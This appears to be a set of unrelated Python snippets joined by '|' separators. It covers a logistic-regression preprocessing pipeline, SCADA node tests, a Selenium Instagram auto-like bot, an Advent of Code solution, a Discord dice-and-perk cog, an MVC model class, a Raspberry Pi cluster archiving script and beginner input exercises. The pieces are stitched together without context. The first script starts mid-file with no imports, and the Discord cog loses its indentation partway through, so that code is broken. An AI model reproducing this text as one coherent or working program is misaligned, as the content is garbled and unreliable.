# find out if there are any null/missing values
# Note - In this example the value -1 is treated as null. So we replace all -1 values with np.nan in the dataset
print(df.isin(['-1']).sum(axis=0))
df.replace(-1,np.nan,inplace=True)
print(df.isnull().sum())
#print(df.isna().sum())
# print percentages
print(df.isnull().sum()/len(df) * 100)
# remove those columns which have more than 60% values missing
# saving missing values in a variable
a = df.isnull().sum()/len(df)*100
# saving column names in a variable
variables = df.columns
drop_variables = [ ]
for i in range(0,len(df.columns)):
    if a[i] > 60: #setting the threshold as 60%
        drop_variables.append(variables[i])
df.drop(drop_variables, axis=1, inplace=True)
print(df.shape)
print(df.isnull().sum()/len(df) * 100)
# Separate the prediction target from the feature columns.
label = df.pop('target')
# ************* Exploratory data analysis and pre-processing ****************************
columns_list = df.columns
# segregate the features into categorical, binary and numerical features
# (the dataset encodes the feature kind in the column-name suffix: _bin / _cat)
cat_cols = []
num_cols = []
bin_cols = []
for col_name in columns_list:
    if 'bin' in col_name:
        bin_cols.append(col_name)
    elif 'cat' in col_name:
        cat_cols.append(col_name)
    else:
        num_cols.append(col_name)
print(f"Binary colums={len(bin_cols)} , Categorical columns={len(cat_cols)}, Numeric columns={len(num_cols)}")
# Convert categorical and binary columns as categorical data-type
df[cat_cols] = df[cat_cols].astype('category')
df[bin_cols] = df[bin_cols].astype('category')
# plot pycharts for all categorical columns to check for skewed data
plot_pie_charts(df, cat_cols)
# drop all columns which are more than 90% skewed
df.drop(['ps_car_07_cat', 'ps_car_10_cat'], axis=1,inplace=True)
cat_cols.remove('ps_car_07_cat')
cat_cols.remove('ps_car_10_cat')
# plot pycharts for all binary columns to check for skewed data
plot_pie_charts(df, bin_cols)
# drop all columns which are more than 90% skewed
df.drop(['ps_ind_10_bin', 'ps_ind_11_bin', 'ps_ind_12_bin', 'ps_ind_13_bin'], axis=1,inplace=True)
bin_cols.remove('ps_ind_10_bin')
bin_cols.remove('ps_ind_11_bin')
bin_cols.remove('ps_ind_12_bin')
bin_cols.remove('ps_ind_13_bin')
# Split the data into train and test sets
# (stratify keeps the heavily imbalanced target ratio equal in both splits)
train_df, test_df, label_train, label_test = train_test_split(df, label, random_state=101, stratify=label, test_size=0.2)
# Now we have to impute those values which are missing
# For continuous values we would impute them with mean/median
imputer1 = SimpleImputer(missing_values= np.nan, strategy='mean')
train_df[num_cols] = imputer1.fit_transform(train_df[num_cols])
test_df[num_cols] = imputer1.transform(test_df[num_cols])
print(train_df.isnull().sum()/len(train_df) * 100)
# For categorical variables, we would impute them with their mode
imputer2 = SimpleImputer(missing_values=np.nan, strategy='most_frequent')
train_df[cat_cols] = imputer2.fit_transform(train_df[cat_cols])
test_df[cat_cols] = imputer2.transform(test_df[cat_cols])
print(train_df.isnull().sum()/len(train_df) * 100)
# Now there are no missing values.
# Note that for training data we use fit_transform, but for test-data we use only transform
# Use the low variance method to remove columns having low variance
# First normaize the data. Note that Standard scaler cannot be used here since it makes all variances uniform
train_df[num_cols] = normalize(train_df[num_cols])
variance = train_df[num_cols].var()
# drop all variables having variance less than 0.006
drop_vari = []
for i in range(0, len(variance)):
    if variance[i] <= 0.006:
        drop_vari.append(num_cols[i])
train_df.drop(drop_vari,axis=1, inplace=True)
test_df.drop(drop_vari,axis=1, inplace=True)
for item in drop_vari:
    num_cols.remove(item)
# Now we check for correlation between the nemeric variables and drop any variables having correlation great than 0.5 or 0.6
# plot correlation matrix for numeric columns
# NOTE(review): the correlation is computed on the full df, not on train_df --
# confirm whether using pre-split data here is intended.
corr_matrix = df[num_cols].corr()
plt.figure(figsize=(20,10))
sns.heatmap(corr_matrix,cmap="BrBG",annot=True)
# We remove one of the variables having correlation more than 0.5
# Note - here we dont have any highly corelated features as seen in the correlation matrix
corr_feat_pos_all, corr_feat_neg_all = find_corr_features(corr_matrix)
if len(corr_feat_pos_all) > 0:
    print("Features with positive correlation:")
    print(corr_feat_pos_all)
    for (f1,f2,corr) in corr_feat_pos_all:
        print("Dropping feature={}".format(f1))
        train_df = train_df.drop(columns=f1, errors='ignore')
        test_df = test_df.drop(columns=f1, errors='ignore')
        num_cols.remove(f1)
else:
    print("0 features with positive correlation")
if len(corr_feat_neg_all) > 0:
    print("Features with negative correlation:")
    print(corr_feat_neg_all)
    for (f1,f2,corr) in corr_feat_neg_all:
        print("Dropping feature={}".format(f1))
        train_df = train_df.drop(columns=f1, errors='ignore')
        test_df = test_df.drop(columns=f1, errors='ignore')
        num_cols.remove(f1)
else:
    print("0 features with negative correlation")
#train_df[num_cols].hist()
# Now we apply MinMax scaler to the numerical columns
std_scaler = MinMaxScaler()
train_df[num_cols] = std_scaler.fit_transform(train_df[num_cols])
test_df[num_cols] = std_scaler.transform(test_df[num_cols])
#train_df[num_cols].hist()
# Now we check if the output label is skewed or not
label_train.value_counts().plot(kind='pie', figsize=(5,5), autopct='%1.2f%%')
# We see that 96% of the labels are skewed towards 0. We need to upsample or down-weight for 1
# Create a logistic regression model.The class_weight='balanced' automatically adjusts the weights for the target classes.
lreg_model = LogisticRegression(max_iter=500,class_weight='balanced')
print("Training log reg model....")
lreg_model.fit(train_df,label_train)
print("Evaluate the model with test results")
score = lreg_model.score(test_df,label_test)
print("Score on test data :", score)
# Make predictions on test data
label_pred = lreg_model.predict(test_df)
print("Classification report:")
print(classification_report(label_test,label_pred))
print("F1 score:", f1_score(label_test,label_pred))
# **** Now we check for variables which have high coefficients and consider only those variables
print("Logistic regression coffecients:")
print(lreg_model.coef_)
X = train_df.columns
Xl = range(len(X))
# Flatten the (1, n_features) coefficient matrix to a vector.
C = lreg_model.coef_.reshape(-1)
# plot the values of the coefficients
plt.figure(figsize=(8,6))
plt.bar(Xl,abs(C))
# Create a data-frame with the variables and their cofficients
coeff_df = pd.DataFrame({
    'variables': X ,
    'coefficients': abs(C)
})
# Get the list of cofficients which have values greater than a particular value
coeff_cols = coeff_df[(coeff_df.coefficients > 0.3)]
# Take only a subset of train_df which contains only tha variables having high coefficients
train_df = train_df[coeff_cols['variables'].values]
test_df = test_df[coeff_cols['variables'].values]
# Now train the logistic regression model on the reduced subset of columns
print("Training logisitc reg model with selected columns ....")
logisreg_model = LogisticRegression(max_iter=1000,class_weight='balanced')
logisreg_model.fit(train_df,label_train)
print("Evaluate the model with test results")
score = logisreg_model.score(test_df,label_test)
print("Score on test data :", score)
# Make predictions on test data
label_pred = logisreg_model.predict(test_df)
print("Classification report on test data:")
print(classification_report(label_test,label_pred))
print("Test F1 score:", f1_score(label_test,label_pred))
# Compare against train-set scores to gauge over/under-fitting.
pred_train = logisreg_model.predict(train_df)
print("Train_F1 score:", f1_score(label_train,pred_train))
print("Classification report on train data:")
print(classification_report(label_train,pred_train))
#%%
# use Random forest classifier to find out most important features
#https://www.kdnuggets.com/2015/05/7-methods-data-dimensionality-reduction.html
print("Building random forest....")
my_importance_model = RandomForestClassifier(random_state=1, max_depth=10)
my_importance_model.fit(train_df, label_train)
print(my_importance_model.feature_importances_)
print("plotting top 10 fetures......")
plt.figure(figsize=(10,10))
feat_importances = pd.Series(my_importance_model.feature_importances_, index = train_df.columns)
feat_importances.nlargest(10).plot(kind='barh');
plt.xlabel('Relative Importance')
print("Selecting top 10 features .....")
# Select top 10 important features from the model
# NOTE(review): SelectFromModel defaults to a mean-importance threshold, not
# a fixed top-10 -- confirm the selected count matches the intent.
feature = SelectFromModel(my_importance_model)
Fit = feature.fit_transform(train_df,label_train)
# Now run logistic regression with the new selected list of features
print("Training log reg model....")
lreg_model.fit(Fit,label_train)
test_df = feature.transform(test_df)
print("Evaluate the model with test results")
score = lreg_model.score(test_df,label_test)
print("Score on test data :", score)
# Make predictions on test data
label_pred = lreg_model.predict(test_df)
print("Classification report:")
print(classification_report(label_test,label_pred))
print("F1 score:", f1_score(label_test,label_pred))
|
from scadapy import NodeId
from scada_test import BaseTest
class PingTest(BaseTest):
    """Smoke tests for basic node lookup and 'Creates' reference traversal."""

    def test_ping(self):
        # Look up the DataItems node and sanity-check its identity.
        data_items = self.client.node(NodeId.DataItems)
        # NOTE(review): this compares the node object with the NodeId directly,
        # while test_data_group_type compares `.node_id` -- confirm the node
        # class defines equality against NodeId values.
        assert data_items == NodeId.DataItems
        assert data_items.browse_name == "DataItems"

    def test_data_items(self):
        # The DataItems node should be able to create both groups and items.
        data_items = self.client.node(NodeId.DataItems)
        creates = data_items.targets(NodeId.Creates)
        assert NodeId.DataGroupType in creates
        assert NodeId.DataItemType in creates

    def test_data_group_type(self):
        # Groups can create nested groups and items (recursive structure).
        data_group_type = self.client.node(NodeId.DataGroupType)
        assert data_group_type.node_id == NodeId.DataGroupType
        assert data_group_type.browse_name == "DataGroupType"
        creates = data_group_type.targets(NodeId.Creates)
        assert NodeId.DataGroupType in creates
        assert NodeId.DataItemType in creates
from selenium import webdriver
from selenium.webdriver.support.ui import Select
from selenium.webdriver.common.keys import Keys
import time
class bot:
    """Instagram bot: logs in through the Facebook flow and likes posts
    found under a given hashtag. Relies on hard-coded CSS class names and
    fixed sleeps, so it is fragile against Instagram UI changes."""

    def __init__(self,email,password):
        # Local chromedriver path.
        # NOTE(review): \S and \c are invalid escape sequences that happen to
        # survive as literal characters -- a raw string would be safer.
        self.driver = webdriver.Chrome("D:\Sourav (softwares)\chromedriver.exe")
        self.email=email
        self.password=password

    def login(self):
        """Log in to Instagram via the 'Log in with Facebook' button."""
        driver=self.driver
        driver.get("https://www.instagram.com/")
        driver.find_element_by_xpath("//button[contains(text(),'Log in with Facebook')]").click()
        email=driver.find_element_by_xpath("//input[@name='email']")
        email.send_keys(self.email)
        password=driver.find_element_by_xpath("//input[@name='pass']")
        password.send_keys(self.password)
        password.send_keys(Keys.RETURN)
        # Fixed wait for the post-login page to load before dismissing dialogs.
        time.sleep(6)
        # Dismiss the "save login info / notifications" popup.
        notnow=driver.find_element_by_xpath("//button[contains(@class,'HoLwm')]")
        notnow.click()

    def like(self,hashtag):
        """Open the hashtag explore page and like every collected post link."""
        driver=self.driver
        driver.get("https://www.instagram.com/explore/tags/"+hashtag+"/")
        time.sleep(2)
        # Scroll several times so more posts get lazy-loaded into the page.
        for i in range(1,6):
            driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
            time.sleep(2)
        hrefs=driver.find_elements_by_tag_name("a")
        pics=[elems.get_attribute("href") for elems in hrefs]
        pics=[href for href in pics]
        print(hashtag+"="+str(len(pics)))
        count=0
        for links in pics:
            driver.get(links)
            try:
                # Click the heart (outline) icon; raises if the post is already
                # liked or the class names have changed, which the except absorbs.
                driver.find_element_by_xpath("//button[contains(@class,'dCJp8 afkep _0mzm-')]//span[contains(@class,'glyphsSpriteHeart__outline__24__grey_9 u-__7')]").click()
                count=count+1
                print("Liking Pic No="+str(count))
                driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
                # Long delay between likes to reduce rate-limiting risk.
                time.sleep(18)
            except Exception as e:
                time.sleep(2)
# Replace with real Facebook credentials and a target hashtag before running.
sourav= bot("email","password")
sourav.login()
sourav.like("hashtag")
|
# Prompt for the user's name and age, then echo them back on one line.
name = input("Your name? ")
age = input("Age ")
# input() already returns a string, so the previous str(age) was redundant.
print(name + " " + age)
|
# AdventOfCode 2019 day 4 pt 1
# https://adventofcode.com/2019/day/4
# started 7:15-paused 8:00
# started over at 9:05 - 10:00


def is_valid_password(number):
    """Return True if `number` satisfies the day-4 password rules:
    digits never decrease left-to-right, and at least one pair of
    adjacent digits is equal."""
    previous = 0
    has_double_digit = False
    for char in str(number):
        digit = int(char)
        if digit < previous:
            # Digits decreased: cannot be a valid password.
            return False
        if digit == previous:
            has_double_digit = True
        previous = digit
    return has_double_digit


def count_possible_passwords(low, high):
    """Count the valid passwords in the inclusive range [low, high]."""
    return sum(1 for i in range(low, high + 1) if is_valid_password(i))


if __name__ == "__main__":
    # Puzzle input range; refactored from a flat for/else loop into
    # testable helpers (same result).
    low, high = [171309, 643603]
    print(count_possible_passwords(low, high))  # 1625
|
from .Utils import *
from discord.ext import commands
from dice_roller.DiceThrower import DiceThrower
from card_picker.Deck import Deck
from card_picker.Card import *
from flipper.Tosser import Tosser
from flipper.Casts import *
class Games(commands.Cog):
"""Game tools! Custom RNG tools for whatever."""
    def __init__(self, bot):
        # Keep a reference to the bot so commands can reach shared state.
        self.bot = bot
    @commands.command(pass_context=True)
    async def dice(self, ctx, roll='1d1'):
        """Roll some dice! Great for RPG and such.
        See here for the roll syntax: https://github.com/pknull/rpg-dice"""
        # DiceThrower returns a dict on success, something else on parse failure.
        msg = DiceThrower().throw(roll)
        print(msg)  # NOTE(review): debug leftover -- consider removing or logging
        if type(msg) is dict:
            # Hide the modified total when no modifier changed the natural roll.
            if msg['natural'] == msg['modified']:
                msg.pop('modified', None)
            title = '🎲 Dice Roll'
            embed = make_embed(title, msg)
            await ctx.message.channel.send(embed=embed)
        else:
            await ctx.message.channel.send("Error parsing dice.")
    @commands.command(pass_context=True)
    async def card(self, ctx, card: str, count=1):
        """Deal a hand of cards. Doesn't currently support games.
        cards: [standard,shadow,tarot,uno]"""
        # Map the user-supplied deck name to its card class.
        card_conv = {
            'standard' : StandardCard,
            'shadow' : ShadowCard,
            'tarot' : TarotCard,
            'uno' : UnoCard
        }
        if len(card) > 0:
            card_type = card
        else:
            # Fallback; in practice `card` is a required argument, so this
            # branch is only hit with an explicitly empty string.
            card_type = 'standard'
        # NOTE(review): an unknown deck name raises KeyError here rather than
        # sending the "Error parsing cards." message below -- confirm intended.
        cards = card_conv[card_type]
        deck = Deck(cards)
        deck.create()
        deck.shuffle()
        hand = deck.deal(count)
        if type(hand) is list:
            # Capitalize the deck name for the embed title.
            title = '🎴 Card Hand ' + card_type[0].upper() + card_type[1:]
            embed = make_embed(title, hand)
            await ctx.message.channel.send(embed=embed)
        else:
            await ctx.message.channel.send("Error parsing cards.")
    @commands.command(pass_context=True)
    async def coin(self, ctx, count=1):
        """Flip a coin. Add a number for multiples."""
        # Tosser returns a list of results on success.
        tosser = Tosser(Coin)
        result = tosser.toss(count)
        if type(result) is list:
            title = '⭕ Coin Flip'
            embed = make_embed(title, result)
            await ctx.message.channel.send(embed=embed)
        else:
            await ctx.message.channel.send("Error parsing coin.")
    @commands.command(pass_context=True)
    async def eightball(self, ctx, count=1):
        """Rolls an eightball!"""
        # Same flow as coin/dice but with the EightBall cast.
        tosser = Tosser(EightBall)
        result = tosser.toss(count)
        if type(result) is list:
            title = '🎱 Eightball'
            embed = make_embed(title, result)
            await ctx.message.channel.send(embed=embed)
        else:
            await ctx.message.channel.send("Error parsing eightball.")
    @commands.command(pass_context=True)
    async def killer(self, ctx, count=1):
        """Pick a Dead By Daylight Killer!"""
        # Ad-hoc "die" whose faces are the killer names.
        class Killer:
            SIDES = ['Trapper', 'Wraith', 'Hillbilly', 'Nurse', 'Shape', 'Hag', 'Doctor', 'Huntress', 'Cannibal',
                     'Nightmare', 'Pig', 'Clown', 'Spirit', 'Legion', 'Plague', 'Ghost Face']
        tosser = Tosser(Killer)
        # Second argument presumably requests unique draws -- TODO confirm in Tosser.toss.
        result = tosser.toss(count, True)
        if type(result) is list:
            title = '🗡 Killers'
            embed = make_embed(title, result)
            await ctx.message.channel.send(embed=embed)
        else:
            await ctx.message.channel.send("Error parsing killer.")
    @commands.command(pass_context=True)
    async def sperks(self, ctx, count=4):
        """Pick a Dead By Daylight Survivor Perk!"""
        # Ad-hoc "die" whose faces are the survivor perk names;
        # default count of 4 matches an in-game perk loadout.
        class SPerks:
            SIDES = ['Ace in the Hole', 'Adrenaline', 'Aftercare', 'Alert',
                     'Autodidact', 'Balanced Landing', 'Boil Over', 'Bond',
                     'Borrowed Time', 'Botany Knowledge', 'Breakdown',
                     'Buckle Up', 'Calm Spirit', 'Dance With Me',
                     'Dark Sense', 'Dead Hard', 'Decisive Strike', 'Déjà Vu',
                     'Deliverance', 'Detective\'s Hunch', 'Distortion',
                     'Diversion', 'Empathy', 'Flip-Flop', 'Head On', 'Hope', 'Iron Will',
                     'Kindred', 'Leader', 'Left Behind', 'Lightweight',
                     'Lithe',
                     'Mettle of Man', 'No Mither', 'No One Left Behind',
                     'Object of Obsession', 'Open-Handed', 'Pharmacy',
                     'Plunderer\'s Instinct',
                     'Poised', 'Premonition', 'Prove Thyself',
                     'Quick & Quiet', 'Resilience', 'Saboteur', 'Self-Care',
                     'Slippery Meat',
                     'Small Game', 'Sole Survivor', 'Solidarity',
                     'Spine Chill', 'Sprint Burst', 'Stake Out',
                     'Streetwise', 'This Is Not Happening',
                     'Technician', 'Tenacity', 'Up the Ante', 'Unbreakable',
                     'Urban Evasion', 'Vigil', 'Wake Up!', 'We\'ll Make It',
                     'We\'re Gonna Live Forever',
                     'Windows of Opportunity']
        tosser = Tosser(SPerks)
        # Second argument presumably requests unique draws -- TODO confirm in Tosser.toss.
        result = tosser.toss(count, True)
        if type(result) is list:
            title = '🔣 Survivor Perks'
            embed = make_embed(title, result)
            await ctx.message.channel.send(embed=embed)
        else:
            await ctx.message.channel.send("Error parsing survivor perks.")
    @commands.command(pass_context=True)
    async def kperks(self, ctx, count=4):
        """Pick a Dead By Daylight Killer Perk!"""
        # Full killer-perk pool; drawn without repeats (unique=True),
        # defaulting to a standard 4-perk loadout.
        class KPerks:
            SIDES = ['A Nurse\'s Calling', 'Agitation', 'Bamboozle', 'Barbecue & Chill',
                     'Beast of Prey', 'Bitter Murmur', 'Bloodhound', 'Blood Warden',
                     'Brutal Strength', 'Corrupt Intervention', 'Coulrophobia',
                     'Dark Devotion', 'Deerstalker', 'Discordance', 'Distressing',
                     'Dying Light', 'Enduring', 'Fire Up', 'Franklin\'s Demise',
                     'Furtive Chase', 'Hangman\'s Trick', 'Hex: Devour Hope',
                     'Hex: Haunted Ground', 'Hex: Huntress Lullaby', 'Hex: No One Escapes Death',
                     'Hex: Ruin', 'Hex: The Third Seal', 'Hex: Thrill of the Hunt', 'I\'m All Ears',
                     'Infectious Fright', 'Insidious', 'Iron Grasp', 'Iron Maiden',
                     'Knock Out', 'Lightborn', 'Mad Grit', 'Make Your Choice', 'Monitor & Abuse',
                     'Monstrous Shrine', 'Overcharge', 'Overwhelming Presence',
                     'Play with Your Food', 'Pop Goes the Weasel', 'Predator', 'Rancor',
                     'Remember Me', 'Save the Best for Last', 'Shadowborn', 'Sloppy Butcher',
                     'Spies from the Shadows', 'Spirit Fury', 'Stridor', 'Surveillance',
                     'Territorial Imperative', 'Tinkerer', 'Thanatophobia', 'Thrilling Tremors',
                     'Unnerving Presence', 'Unrelenting', 'Whispers']
        tosser = Tosser(KPerks)
        result = tosser.toss(count, True)
        if type(result) is list:
            title = '🔣 Killer Perks'
            embed = make_embed(title, result)
            await ctx.message.channel.send(embed=embed)
        else:
            await ctx.message.channel.send("Error parsing killer perks.")
@commands.command(pass_context=True)
async def defender(self, ctx, count=1):
"""Pick a Rainbow Six DEFENDER"""
class Defender:
SIDES = ["Alibi", "Bandit", "Castle", "Caveira", "Clash", "Doc", "Echo", "Ela", "Frost", "Jäger", "Kaid",
"Kapkan", "Lesion", "Maestro", "Mira", "Mozzie", "Mute", "Pulse", "Recruit", "Rook", "Smoke",
"Tachanka", "Valkyrie", "Vigil", "Warden"]
tosser = Tosser(Defender)
result = tosser.toss(count, True)
if type(result) is list:
title = '🛡️ Defenders'
embed = make_embed(title, result)
await ctx.message.channel.send(embed=embed)
else:
await ctx.message.channel.send("Error parsing defender.")
@commands.command(pass_context=True)
async def attacker(self, ctx, count=1):
"""Pick a Rainbow Six ATTACKER"""
class Attacker:
SIDES = ["Ash", "Blackbeard", "Blitz", "Buck", "Capitão", "Dokkaebi", "Finka", "Fuze", "Glaz", "Gridlock",
"Hibana", "IQ", "Jackal", "Lion", "Maverick", "Montagne", "Nomad", "Nøkk", "Recruit", "Sledge",
"Thatcher", "Thermite", "Twitch", "Ying", "Zofia"]
tosser = Tosser(Attacker)
result = tosser.toss(count, True)
if type(result) is list:
title = '🔫 Attackers'
embed = make_embed(title, result)
await ctx.message.channel.send(embed=embed)
else:
await ctx.message.channel.send("Error parsing attacker.")
@commands.command(pass_context=True)
async def toss(self, ctx, items, count=1, unique='t'):
"""Pick an amount from a list"""
words = items.split(',')
user_list = lambda: None
setattr(user_list, 'SIDES', words)
tosser = Tosser(user_list)
result = tosser.toss(count, bool(unique == 't'))
if type(result) is list:
title = '⁉ Lists!'
embed = make_embed(title, result)
await ctx.message.channel.send(embed=embed)
else:
await ctx.message.channel.send("Error parsing list.")
def setup(bot):
    # discord.py extension entry point: register the Games cog on the bot.
    bot.add_cog(Games(bot))
|
from .database import *
class Model:
    """
    The Model: this class holds the data structure.
    -- The Controller can send messages to the Model,
       and the Model can answer them.
    -- The Model uses delegates to send messages
       to the Controller when data changes.
    -- The Model NEVER communicates with the View.
    -- The Model has getters and setters to communicate
       with the Controller.
    """
    def __init__(self, vc):
        # vc: the controller that receives change notifications.
        self.vc = vc
        # Backing database used for persistence.
        self.db = Database()
    def data_changed_delegate(self):
        # Forward the data-changed notification to the controller.
        self.vc.data_changed_delegate()
    def set_new_user(self, customer, address, country):
        # Persist a new user, then notify the controller of the change.
        self.db.set_new_user(customer, address, country)
        self.data_changed_delegate()
|
import os, sys
import subprocess
import fileinput
import time
import sendFile
#sysfs = os.statvfs("/media/pi/")
listNodes = []  # active storage nodes: dicts with "ip", "Active", "capacity"
maxNodes = 3  # maximum number of nodes the cluster may grow to
fileSequence = 1  # monotonically increasing index assigned to sent files
totalDataSent = 0  # running total of bytes archived so far
filesDiretory = "/"  # root directory scanned for files to archive
def getNewNode():
    """Wait until the next node's IP answers ping, set it up, and register it.

    Node IPs are assigned sequentially starting at 192.168.0.2; the new
    node (with its reported capacity) is appended to the global listNodes.
    """
    assert(len(listNodes) < maxNodes)
    nodeIP = "192.168.0." + str(2 + len(listNodes))
    pingCmd = ("ping -W 1 -c 1 " + nodeIP).split()
    pingOut = subprocess.Popen(pingCmd, stdout=subprocess.PIPE).communicate()[0].decode()
    # Keep pinging until exactly one reply comes back.
    while "1 received" not in pingOut:
        print("Node", len(listNodes) + 1, "is unavailable. Plug it in now. Retrying in 5 seconds.")
        pingProc = subprocess.Popen(pingCmd, stdout=subprocess.PIPE)
        time.sleep(5)
        pingOut = pingProc.communicate()[0].decode()
    print("Found new node:", nodeIP)
    freshNode = {"ip": nodeIP, "Active": True}
    freshNode["capacity"] = setupNewNode(nodeIP)
    listNodes.append(freshNode)
def setupNewNode(ip):
    """Run the setup script on a node, start its remote service, and
    return the capacity (bytes) parsed from the setup script's output."""
    setupOut = subprocess.Popen(("./setupOneNode.sh " + ip).split(),
                                stdout=subprocess.PIPE).communicate()[0].decode()
    # Capacity is delimited by the markers startcapacity...endcapacity.
    capacityText = setupOut[setupOut.find("startcapacity") + 13:setupOut.find("endcapacity")]
    subprocess.Popen(("./runRemote.sh " + ip).split(),
                     stdout=subprocess.PIPE).communicate()
    # Give the remote service a moment to come up.
    time.sleep(3)
    return int(capacityText)
def getFiles(location):
    """Recursively list regular files under `location` (must end with "/").

    Returns a list of dicts with keys "size" (bytes), "location" (the
    containing directory), and "name".  Parses `ls -l` output: directories
    are descended into, zero-byte files are skipped, and single quotes are
    stripped from names.
    """
    call = subprocess.Popen(["ls", "-l", location], stdout=subprocess.PIPE)
    rv = call.communicate()[0].decode().split("\n")
    firstList = [f.split() for f in rv]
    returnList = []
    for each in firstList:
        # A regular `ls -l` entry has at least 9 whitespace-separated
        # fields; the "total N" header and blank lines have fewer.
        # Fix: the old guard `len(each) > 2 and len(each) < 10` silently
        # dropped any file or directory whose name contains spaces (those
        # rows have more than 9 fields), making the re-join loop below
        # unreachable.
        if len(each) >= 9:
            n = each[8]
            if len(each) > 9:
                # Re-join names that contain spaces.
                for s in each[9:]:
                    n += " " + s
            if each[0][0] == "-" and int(each[4]) > 0:
                returnList.append({"size": int(each[4]), "location": location, "name": n.replace("\'", "")})
            elif each[0][0] == "d":
                returnList += getFiles(location + n.replace("\'", "") + "/")
    return returnList
def storeFiles(files):
    """Archive `files` (as produced by getFiles) onto the cluster nodes.

    Walks the node list in order, sending each file to the first node with
    room, growing the cluster via getNewNode() when full, and appending a
    tab-separated audit line per file to receive_log_master.  Mutates the
    module globals fileSequence/totalDataSent and the listNodes entries.
    """
    global fileSequence
    global maxNodes
    global totalDataSent
    global filesDiretory
    receiveLogFile = open("receive_log_master","a")
    receiveLogFile.write("Storing_file\tStoring_file_size\tStoring_file_index\tStoring_into_node\tFile_transfer_time\tBytes_per_second\tTotal_time_taken\tTotal_data_archived\tNode_capacity\n")
    index = 0
    startTime = time.time()
    while len(files) > 0 and index < maxNodes:
        if index == len(listNodes):
            # Every known node is full: bring another node online.
            print("Out of capacity. Need to add more nodes.")
            getNewNode()
            time.sleep(2)
        elif files[0]["size"]+10000000 < listNodes[index]["capacity"]:
            # Node has room (with a ~10 MB safety margin): send the file.
            receiveLogFile.write(files[0]["name"]+"\t")
            receiveLogFile.write(str(files[0]["size"])+"\t")
            receiveLogFile.write(str(fileSequence)+"\t")
            receiveLogFile.write(str(index+1)+"\t")
            aFile = files.pop(0)
            aFile["node"] = listNodes[index]["ip"]
            h, newCap, tToken = sendFile.sendOneFile(listNodes[index]["ip"], aFile["location"], aFile["name"],str(fileSequence),False)
            print("newCap ",newCap)
            aFile["hash"] = h
            #newCap = 0
            # The node reports its remaining capacity after each transfer.
            listNodes[index]["capacity"] = int(newCap)
            fileSequence += 1
            totalDataSent += aFile["size"]
            receiveLogFile.write(str(tToken)+"\t")
            stringToWrite = str(aFile["size"]/tToken) if tToken > 0 else "0"
            receiveLogFile.write(stringToWrite+"\t")
            receiveLogFile.write(str(time.time()-startTime)+"\t")
            receiveLogFile.write(str(totalDataSent)+"\t")
            receiveLogFile.write(str(newCap)+"\n")
        elif listNodes[index]["capacity"] == -1:
            # Capacity of -1 marks a node that needs a restart: close its
            # session, reboot it, drop it, and bring a fresh node online.
            print("Rebooting node",index)
            h, newCap, tToken = sendFile.sendOneFile(listNodes[index]["ip"], "end", "end","end",True)
            time.sleep(5)
            nextNode = "./restart.sh " + listNodes[index]["ip"]
            call = subprocess.Popen(nextNode.split(),stdout=subprocess.PIPE)
            call.communicate()
            listNodes.pop(index)
            time.sleep(30)
            getNewNode()
            time.sleep(30)
        else:
            # Node is full: end its session and move on to the next node.
            h, newCap, tToken = sendFile.sendOneFile(listNodes[index]["ip"], "end", "end","end",True)
            index += 1
        if len(files) == 0:
            # Re-scan the source directory in case new files appeared.
            files = getFiles(filesDiretory)
    receiveLogFile.write("Done_Archiving_Data\n\n")
def resetCluster():
    """Run ./reset.sh on nodes 192.168.0.2 through 192.168.0.4, waiting
    for each node to answer ping before resetting it."""
    for ipValue in range(2, 5):
        nodeIP = "192.168.0." + str(ipValue)
        pingCmd = ("ping -W 1 -c 1 " + nodeIP).split()
        pingOut = subprocess.Popen(pingCmd, stdout=subprocess.PIPE).communicate()[0].decode()
        # Keep pinging until exactly one reply comes back.
        while "1 received" not in pingOut:
            print("Node", ipValue - 1, "is unavailable. Plug it in now. Retrying in 5 seconds.")
            pingProc = subprocess.Popen(pingCmd, stdout=subprocess.PIPE)
            time.sleep(5)
            pingOut = pingProc.communicate()[0].decode()
        subprocess.Popen(("./reset.sh " + nodeIP).split(),
                         stdout=subprocess.PIPE).communicate()
def verifyCluster():
    """Run ./verify.sh on nodes 192.168.0.2 through .4, logging the start
    time to verify_log_master.

    Fix: the log file is now opened with a context manager so the handle
    is closed even if ping/verify raises (previously an exception leaked
    the open file).
    """
    with open("verify_log_master", "a") as verifyLogFile:
        ipValue = 2
        startTime = time.time()
        verifyLogFile.write("Starting_verifyCluster "+str(startTime)+"\n")
        while (ipValue <= 4):
            nextIP = "192.168.0." + str(ipValue)
            nextNode = "ping -W 1 -c 1 " + nextIP
            call = subprocess.Popen(nextNode.split(),stdout=subprocess.PIPE)
            returnValue = call.communicate()[0].decode()
            # Wait for the node to come online before verifying it.
            while ("1 received" not in returnValue):
                print("Node",ipValue-1,"is unavailable. Plug it in now. Retrying in 5 seconds.")
                call = subprocess.Popen(nextNode.split(),stdout=subprocess.PIPE)
                time.sleep(5)
                returnValue = call.communicate()[0].decode()
            nextNode = "./verify.sh " + nextIP
            call = subprocess.Popen(nextNode.split(),stdout=subprocess.PIPE)
            call.communicate()
            ipValue += 1
def main():
    """Interactive command loop for the archive cluster master:
    q=quit, v=verify, s=shutdown, a=archive, r=reset, u=upload."""
    global filesDiretory
    while True:
        i = input("Type new command:\nQuit: q\nVerify files: v\nShutdown nodes: s\nArchive files: a\nReset nodes: r\nUpload files: u\n")
        if i.strip() == "q" or i.strip() == "Q":
            exit()
        elif i.strip() == "r" or i.strip() == "R":
            resetCluster()
        elif i.strip() == "s" or i.strip() == "S":
            os.system("./shutdown.sh")
        elif i.strip() == "a" or i.strip() == "A":
            # Ask for the source directory (default: /media/james/Sandisk/),
            # remember it globally so storeFiles can re-scan, then archive.
            x = input("Directory with files to archive is /media/james/Sandisk/. Type full path to change or press enter to use default.")
            if x == "":
                originDirectory = "/media/james/Sandisk/"
            else:
                originDirectory = x
            filesDiretory = originDirectory
            fileList = getFiles(originDirectory)
            storeFiles(fileList)
        elif i.strip() == "v" or i.strip() == "V":
            verifyCluster()
        elif i.strip() == "u" or i.strip() == "U":
            os.system("./uploadFiles.sh")
main() |
# Read ten names from the user, then search for names repeatedly until
# the user enters 'e'.
x = 1
end = False
names = []
while x <= 10:
    n = input("Enter Name #" + str(x) + ": ")
    names.append(n)
    x = x + 1
while end == False:
    # Fix: closed the unbalanced parenthesis in the prompt message.
    search = input("\nSearch for a name (type 'e' to stop)")
    if search in names:
        print(search, " was found")
    else:
        # Fix: `if search="e":` was a SyntaxError — assignment instead of
        # the `==` comparison.
        if search == "e":
            end = True
        else:
            print(search, " was not found")
|
